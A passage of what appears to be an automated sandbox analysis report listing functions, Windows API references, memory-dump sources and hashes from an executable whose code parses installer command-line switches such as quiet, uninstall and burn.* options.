                                                                                                                                                                                                                                                                            • Instruction ID: 3f27c32bc4839adc719ce49766197b7dc2c78e718f13c7480a1a2a57dec87472
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffb2826902fcd03d30a8258db4bc48ec8299edfeb9d056e59076f5bfdbe3b254
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15B012C735E1026E318491155C06E3B014CD0C8F14330E81FB008C1083D4890C400137
                                                                                                                                                                                                                                                                            Function 0094C256 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 04818b01476819194b9232f10986aa2f46dcf44a01d43313b14b49319b951f00
                                                                                                                                                                                                                                                                            • Instruction ID: ec91615f0594d8ff7f865486e46c85648f38857c5bc2787d76be2359bb326ba8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04818b01476819194b9232f10986aa2f46dcf44a01d43313b14b49319b951f00
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53B002D735F1066F319451555D06E3A019CD5C9F15331E95FF419C5143D4895D45113B
                                                                                                                                                                                                                                                                            Function 0094C246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2de89b86cf671aeb869caec64a6fe5d0da8d0ae88d241626d9eaefe08ae3447f
                                                                                                                                                                                                                                                                            • Instruction ID: ca74eec4417789a690e8e6c3bf218ec797d9b8da7d5268862affe994dc7c7df6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2de89b86cf671aeb869caec64a6fe5d0da8d0ae88d241626d9eaefe08ae3447f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9B002D735F2066E329451555D06D3A015CC5C9F15371E55FB419C5143D4895D85113B
                                                                                                                                                                                                                                                                            Function 0094C276 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: cae2e08dfa6149bbd83776266e65e659ef51b725d3a318b6a7889db3fc9c53f4
                                                                                                                                                                                                                                                                            • Instruction ID: 10270e5f72f9b5b25d5dba9614071a90845c1a45bf404a5ceab7a18ccedf8806
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cae2e08dfa6149bbd83776266e65e659ef51b725d3a318b6a7889db3fc9c53f4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19B012CB35E1026E318451155D07D3A014CC8C8F10330E41FB008C0043D48A0C410137
                                                                                                                                                                                                                                                                            Function 0094C266 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C1E9
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 04fbed3df1d44108b39c874f52777db41b6ebac07d08265127c53f0458014c93
                                                                                                                                                                                                                                                                            • Instruction ID: baa90587920d63f62674783ca3dcde70acdb0f3964461728bc46c3ef80e4f03f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04fbed3df1d44108b39c874f52777db41b6ebac07d08265127c53f0458014c93
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9B012C735E2026E328451155C0BD3A014CC4C8F10330E51FB008C4043D4890C840137
                                                                                                                                                                                                                                                                            Function 0094C331 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C343
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: b6e90ca68d56b49f43aa9cd44c4e61d0aa497e0c772a7e2222a56af45f8a0d67
                                                                                                                                                                                                                                                                            • Instruction ID: 6f9fce7078a612469175ef1b65cfc57280e9f1785ad3e248f7413e55ab9fa65a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6e90ca68d56b49f43aa9cd44c4e61d0aa497e0c772a7e2222a56af45f8a0d67
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EAB012D335E103BE314416045D02C3A01CCC0C0B14330E85FB004C4080D4841C010033
                                                                                                                                                                                                                                                                            Function 0094C40C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C424
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: 018ce3b399961b5017f58d31fb7a75a26a6c173d557a2aa88f68e069f02ea573
                                                                                                                                                                                                                                                                            • Instruction ID: e33e24dc210fec55cab829f06948eb8afb08f8d57d5baba6f6d9dbb82832eab6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 018ce3b399961b5017f58d31fb7a75a26a6c173d557a2aa88f68e069f02ea573
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DFB012C335E102FE324421505D06C3B028CC0C0B20331E42FB404C4042D8841C000037
                                                                                                                                                                                                                                                                            Function 0094C43D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C424
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: c97b7f32e88c8317979bc21828483f6e46a8de40dbf643b401fa17abfb56ac52
                                                                                                                                                                                                                                                                            • Instruction ID: eb49a95c873996da8e33bd694c983fa116f305ea2bd90634d60b6ac2889a358e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c97b7f32e88c8317979bc21828483f6e46a8de40dbf643b401fa17abfb56ac52
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26B012C325F102AE328451445E06D3A024CC0C4BA0331E42FF008C8040D8840C010037
                                                                                                                                                                                                                                                                            Function 0094C42D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0094C424
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0094C762
                                                                                                                                                                                                                                                                              • Part of subcall function 0094C6EF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0094C773
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                            • Opcode ID: fefcb2a0cb6568b9b40d072109dbdf465f1d58cf290f50fea63b6fb00edb410f
                                                                                                                                                                                                                                                                            • Instruction ID: 5e1ac94e24e4cc4c6c55815b7d030779c423bf2481ea6026d492461cd09d4de8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fefcb2a0cb6568b9b40d072109dbdf465f1d58cf290f50fea63b6fb00edb410f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18B012C326F102AE328451445D06E3A024CD4C4B64331E82FF008C4040D8840C000037

                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                            Function 0090469C Relevance: 257.0, APIs: 76, Strings: 70, Instructions: 1457stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,00000002,000000FF,0095E414,000000FF,008E6C5C,008E6C78,008E6570,?,00000000,?), ref: 0090470C
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,log,000000FF), ref: 0090472F
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,xlog,000000FF), ref: 00904752
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0095E458,000000FF), ref: 00904775
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0095E45C,000000FF), ref: 00904798
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,help,000000FF), ref: 009047BB
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0095E46C,000000FF), ref: 009047DE
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,quiet,000000FF), ref: 00904801
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0095E47C,000000FF), ref: 00904824
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,silent,000000FF), ref: 00904847
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,passive,000000FF), ref: 0090486A
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,layout,000000FF), ref: 00904898
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,unsafeuninstall,000000FF), ref: 00904970
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,uninstall,000000FF), ref: 009049AE
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,repair,000000FF), ref: 009049EC
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,modify,000000FF), ref: 00904A2A
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,package,000000FF), ref: 00904A68
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,update,000000FF), ref: 00904A8B
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,noaupause,000000FF), ref: 00904AAE
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,keepaupaused,000000FF), ref: 00904AD9
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,disablesystemrestore,000000FF), ref: 00904B0E
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,originalsource,000000FF), ref: 00904B3C
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,parent,000000FF), ref: 00904B9D
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,parent:none,000000FF), ref: 00904BFE
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.log.append,000000FF), ref: 00904C51
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.log.mode,burn.log.mode,000000FF), ref: 00904C99
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00904CAB
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.log.mode), ref: 00904CBF
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.elevated,000000FF), ref: 00904D6C
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.clean.room), ref: 00904E5B
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.clean.room,burn.clean.room,00000000), ref: 00904E69
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00904E7B
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.clean.room), ref: 00904EFB
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.system.component), ref: 00904F7F
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.system.component,burn.system.component,00000000), ref: 00904F8D
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00904F9F
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.system.component), ref: 00904FAF
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.embedded,000000FF), ref: 00905024
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.detect,000000FF), ref: 009050BA
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.upgrade,000000FF), ref: 009050FD
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,burn.related.addon,000000FF), ref: 0090511D
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.dependent.addon,000000FF), ref: 00905141
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.patch,000000FF), ref: 00905164
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.dependent.patch,000000FF), ref: 00905187
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.update,000000FF), ref: 009051AA
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.chain.package,000000FF), ref: 009051D0
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.passthrough,000000FF), ref: 009051F6
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.runonce,000000FF), ref: 00905224
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.ignoredependencies), ref: 00905280
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.ignoredependencies,burn.ignoredependencies,00000000), ref: 0090528E
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 009052A0
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.ignoredependencies), ref: 009052B0
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.ancestors), ref: 00905325
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.ancestors,burn.ancestors,00000000), ref: 00905333
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00905345
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.ancestors), ref: 00905355
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.engine.working.directory), ref: 009053CD
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.engine.working.directory,burn.engine.working.directory,00000000), ref: 009053DB
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 009053ED
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.engine.working.directory), ref: 009053FD
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.filehandle.attached), ref: 00905468
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000), ref: 00905476
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00905488
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.filehandle.attached), ref: 0090549C
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.filehandle.self), ref: 00905527
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000), ref: 00905535
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00905547
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.filehandle.self), ref: 00905557
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.splash.screen), ref: 009055D0
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.splash.screen,burn.splash.screen,00000000), ref: 009055DE
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 009055F0
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.splash.screen), ref: 00905600
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(burn.), ref: 0090567F
